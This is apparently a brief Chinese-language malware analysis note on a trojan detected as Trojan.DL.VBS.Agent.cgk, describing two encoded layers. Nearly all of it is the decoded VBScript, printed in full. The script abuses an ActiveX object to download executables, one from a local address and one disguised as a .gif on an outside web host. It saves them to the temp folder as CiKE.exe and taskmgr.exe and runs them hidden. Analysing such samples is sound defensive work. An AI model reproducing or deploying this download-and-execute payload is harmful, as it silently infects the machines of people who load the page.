Trojan.DL.VBS.Agent.cgk
第一个是明文``
下载setup.exe
第二个是US-ASCII
解后还有acsii加密
解后得:
"60script language="VBScript"> on error resume next
Set adaWSAsjii__HSA = document.createElement("object")
adaWSAsjii__HSA.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set adagoogA = adaWSAsjii__HSA.CreateObject("Microsoft.XMLHTTP","")
caogoogA1="Ado"
caogoogA2="db."
caogoogA3="Str"
caogoogA4="eam"
CnisjIoa__WA=caogoogA1&caogoogA2&caogoogA3&caogoogA4
Cnisjii__WA=CnisjIoa__WA
Set opaipPada = adaWSAsjii__HSA.CreateObject(Cnisjii__WA,"")
opaipPada.type = 1
adagoogA.Open"GET","http://192.168.0.3/setup.exe",False
adagoogA.Send
Set fso = adaWSAsjii__HSA.CreateObject("Scripting.FileSystemObject","")
Set temp = fso.GetSpecialFolder(2)
filename=fso.BuildPath(temp,"CiKE.exe")
opaipPada.open
opaipPada.write adagoogA.responseBody
opaipPada.savetofile filename,2
opaipPada.close
Set exc = adaWSAsjii__HSA.CreateObject("Shell.Application","")
exc.ShellExecute filename,"","","open",0
</script>
<script language="VBScript"> on error resume next
Set adaWSAsjii__HSA = document.createElement("object")
adaWSAsjii__HSA.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set adagoogA = adaWSAsjii__HSA.CreateObject("Microsoft.XMLHTTP","")
caogoogA1="Ado"
caogoogA2="db."
caogoogA3="Str"
caogoogA4="eam"
CnisjIoa__WA=caogoogA1&caogoogA2&caogoogA3&caogoogA4
Cnisjii__WA=CnisjIoa__WA
Set opaipPada = adaWSAsjii__HSA.CreateObject(Cnisjii__WA,"")
opaipPada.type = 1
adagoogA.Open"GET","http://www.es86.com/pic/ddb/2006692151148920.gif",False
adagoogA.Send
Set fso = adaWSAsjii__HSA.CreateObject("Scripting.FileSystemObject","")
Set temp = fso.GetSpecialFolder(2)
filename=fso.BuildPath(temp,"taskmgr.exe")
opaipPada.open
opaipPada.write adagoogA.responseBody
opaipPada.savetofile filename,2
opaipPada.close
Set exc = adaWSAsjii__HSA.CreateObject("Shell.Application","")
exc.ShellExecute filename,"","","open",0
</script>
<script type="text/jscript">
function init() {
document.write("f13E93?941?0?061?9?1?2?0]87 97?3");
}
window.onload = init;
</script>"
某某杀软报Trojan.DL.VBS.Agent.cgk
 |